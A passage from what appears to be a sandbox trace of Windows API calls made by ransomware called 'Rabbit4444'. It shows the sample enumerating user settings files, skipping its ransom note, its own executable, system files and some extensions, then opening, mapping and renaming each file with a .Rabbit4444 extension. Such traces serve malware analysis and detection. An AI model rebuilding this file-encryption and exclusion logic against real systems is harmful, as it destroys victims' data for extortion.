"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_batterysaver_landingpage_overridecontrol.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.101] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x207e69c7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x207e69c7, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x53f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms", cAlternateFileName="AAED09~1.SET")) returned 1 [0057.101] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.102] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.102] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.102] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms", lpString2=".") returned 1 [0057.102] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms", lpString2="..") returned 1 [0057.102] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms", lpString2="windows") returned -1 [0057.102] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.102] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.102] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms", lpString2="boot") returned -1 [0057.102] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.102] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.102] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms" | out: lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms") returned="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms" [0057.102] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.102] lstrlenW (lpString="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms") returned 76 [0057.102] lstrlenW (lpString="Rabbit4444") returned 10 [0057.102] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.102] lstrlenW (lpString=".dll") returned 4 [0057.102] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.102] lstrlenW (lpString=".lnk") returned 4 [0057.102] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.102] lstrlenW (lpString=".ini") returned 4 [0057.102] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.102] lstrlenW (lpString=".sys") returned 4 [0057.102] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.102] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_batterysaver_landingpage_settingslink-2.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.103] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.103] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14841341023) returned 1 [0057.103] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1343) returned 1 [0057.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0057.103] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x840, lpName=0x0) returned 0x298 [0057.104] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x840) returned 0x70000 [0057.105] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.105] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.105] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.105] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.105] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.105] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.105] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.105] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.105] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14841603103) returned 1 [0057.105] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.105] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0057.105] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.105] CloseHandle (hObject=0x298) returned 1 [0057.106] CloseHandle (hObject=0x278) returned 1 [0057.106] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms.Rabbit4444") returned 204 [0057.106] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_batterysaver_landingpage_settingslink-2.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink-2.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_batterysaver_landingpage_settingslink-2.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.106] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20f0da93, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x20f0da93, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23884dd1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x537, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms", cAlternateFileName="AA2914~1.SET")) returned 1 [0057.106] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.106] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.106] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.106] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms", lpString2=".") returned 1 [0057.106] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms", lpString2="..") returned 1 [0057.106] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms", lpString2="windows") returned -1 [0057.107] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.107] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.107] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms", lpString2="boot") returned -1 [0057.107] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.107] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.107] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms" | out: lpString1="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms") returned="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms" [0057.107] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.107] lstrlenW (lpString="AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms") returned 74 [0057.107] lstrlenW (lpString="Rabbit4444") returned 10 [0057.107] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.107] lstrlenW (lpString=".dll") returned 4 [0057.107] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.107] lstrlenW (lpString=".lnk") returned 4 [0057.107] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.107] lstrlenW (lpString=".ini") returned 4 [0057.107] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.107] lstrlenW (lpString=".sys") returned 4 [0057.107] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.107] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_batterysaver_landingpage_settingslink.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.108] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.108] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14841842089) returned 1 [0057.108] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1335) returned 1 [0057.108] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.108] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0057.108] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x840, lpName=0x0) returned 0x298 [0057.109] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x840) returned 0x70000 [0057.110] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.110] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.110] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.110] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.110] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14842086054) returned 1 [0057.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.110] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0057.110] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.110] CloseHandle (hObject=0x298) returned 1 [0057.110] CloseHandle (hObject=0x278) returned 1 [0057.110] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms.Rabbit4444") returned 202 [0057.110] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_batterysaver_landingpage_settingslink.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_SettingsLink.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_batterysaver_landingpage_settingslink.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.111] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x213ac3fd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x213ac3fd, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x54e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms", cAlternateFileName="AA1E1A~1.SET")) returned 1 [0057.111] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.111] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.111] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.111] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms", lpString2=".") returned 1 [0057.111] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms", lpString2="..") returned 1 [0057.111] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms", lpString2="windows") returned -1 [0057.111] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.112] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.112] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms", lpString2="boot") returned -1 [0057.112] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.112] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.112] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms" | out: lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms") returned="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms" [0057.112] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.112] lstrlenW (lpString="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms") returned 80 [0057.112] lstrlenW (lpString="Rabbit4444") returned 10 [0057.112] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.112] lstrlenW (lpString=".dll") returned 4 [0057.112] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.112] lstrlenW (lpString=".lnk") returned 4 [0057.112] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.112] lstrlenW (lpString=".ini") returned 4 [0057.112] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.112] lstrlenW (lpString=".sys") returned 4 [0057.112] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.112] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_batterysaver_landingpage_usagedetailslink-2.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.112] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.112] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14842323345) returned 1 [0057.113] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1358) returned 1 [0057.113] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0057.113] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0057.113] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x298 [0057.114] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x70000 [0057.115] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.115] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.115] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.115] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0057.115] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.115] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0057.115] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.115] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.115] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14842581039) returned 1 [0057.115] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0057.115] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0057.115] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.115] CloseHandle (hObject=0x298) returned 1 [0057.115] CloseHandle (hObject=0x278) returned 1 [0057.115] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms.Rabbit4444") returned 208 [0057.115] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_batterysaver_landingpage_usagedetailslink-2.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink-2.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_batterysaver_landingpage_usagedetailslink-2.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.116] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x224cf2c5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x224cf2c5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x546, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms", cAlternateFileName="AA138B~1.SET")) returned 1 [0057.116] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.116] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.116] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.116] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms", lpString2=".") returned 1 [0057.116] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms", lpString2="..") returned 1 [0057.116] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms", lpString2="windows") returned -1 [0057.116] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.116] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.116] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms", lpString2="boot") returned -1 [0057.116] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.116] lstrcmpiW (lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.116] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms" | out: lpString1="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms") returned="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms" [0057.116] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.117] lstrlenW (lpString="AAA_SystemSettings_BatterySaver_LandingPage_UsageDetailsLink.settingcontent-ms") returned 78 [0057.117] lstrlenW (lpString="Rabbit4444") returned 10 [0057.117] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.117] lstrlenW (lpString=".dll") returned 4 [0057.117] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.117] lstrlenW (lpString=".lnk") returned 4 [0057.117] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.117] lstrlenW (lpString=".ini") returned 4 [0057.117] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.117] 